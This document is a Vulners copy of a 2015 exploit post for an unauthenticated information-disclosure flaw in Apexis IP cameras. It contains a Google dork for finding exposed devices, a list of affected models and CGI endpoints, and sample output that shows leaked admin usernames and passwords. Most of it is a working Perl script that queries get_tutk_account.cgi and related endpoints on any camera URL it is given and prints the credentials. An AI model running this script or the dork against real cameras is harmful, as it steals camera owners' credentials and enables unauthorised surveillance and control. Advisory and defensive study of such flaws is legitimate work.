Vulners
Lucene search
Apexis IP CAM - Information Disclosure Vulnerability
*# Exploit Title: Apexis IP CAM - Full Info Disclosure **
**# Google Dork: inurl:"get_status.cgi"cgi-bin/**
**# Date: 01/06/2015**
**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
Remoteexecution.net**
**# Vendor Homepage: http://www.apexis.com.cn/**
**# Tested on: Linux**
*
*Models Afected :**
**
**APM-H602-MPC**
**APM-H803-MPC**
**APM-H901-MPC**
**APM-H501-MPC**
**APM-H403-MPC**
**APM-H804*
_*
*__*Usage: please enter the url ipcam Example : *_
http://server/cgi-bin/get_status.cgi o
http://server/cgi-bin/get_tutk_account.cgi
_*You get something like this*__*:*_
[[email protected] ]$ perl xploit.pl
[ Apexis IP CAM - Full Info Disclosure ]
[ Discovery by: Sunplace Solutions ]
[ Exploit: Sunplace Solutions - Daniel Godoy ]
[ Greetz: www.remoteexecution.net - ]
URL: http://server/cgi-bin/get_tutk_account.cgi
[x]Trying to pwn =>/get_tutk_account.cgi
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
[x]Trying to pwn => /get_tutk_account
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
[x]Trying to pwn => /get_extra_server.cgi
Result:
extraserv_result=1;
server_enable=0;
server_ipaddr='192.168.1.220';
server_port=6666;
server_time=10;
_*Index of /cgi-bin/ example:*_
backup_params.cgi
check_user.cgi
clear_log.cgi
control_cruise.cgi
decoder_control.cgi
delete_sdcard_file.cgi
download_sdcard_file.cgi
format_sdc.cgi
get_alarm_schedule.cgi
get_camera_vars.cgi
get_cruise.cgi
get_extra_server.cgi
get_list_cruise.cgi
get_log_info.cgi
get_log_page.cgi
get_maintain.cgi
get_motion_schedule.cgi
get_params.cgi
get_preset_status.cgi
get_real_status.cgi
get_sdc_status.cgi
get_status.cgi
get_sycc_account.cgi
get_tutk_account.cgi
get_wifi_scan_result.cgi
mobile_snapshot.cgi
reboot.cgi
And more......
_*[Exploit Code]*__*
*_
#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit: Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
chop($url);
if ($url eq "")
{
print 'URL dont empty!.'."\n";
}
else
{
$www = new LWP::UserAgent;
@path=split(/cgi-bin/,$url);
$content = $www->get($url) or error();
print "\n[x]Trying to pwn =>".$path[1]."\n";
print "Result: \n";
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ //g;
$pwn=~ s/ret_//g;
print $pwn;
print "\n[x]Trying to pwn => /get_tutk_account\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or
error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/ //g;
print $pwn;
print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or
error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/extra_//g;
$pwn=~ s/ //g;
print $pwn;
}
# 0day.today [2018-04-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jun 2015 00:00Current
7.1High risk
Vulners AI Score7.1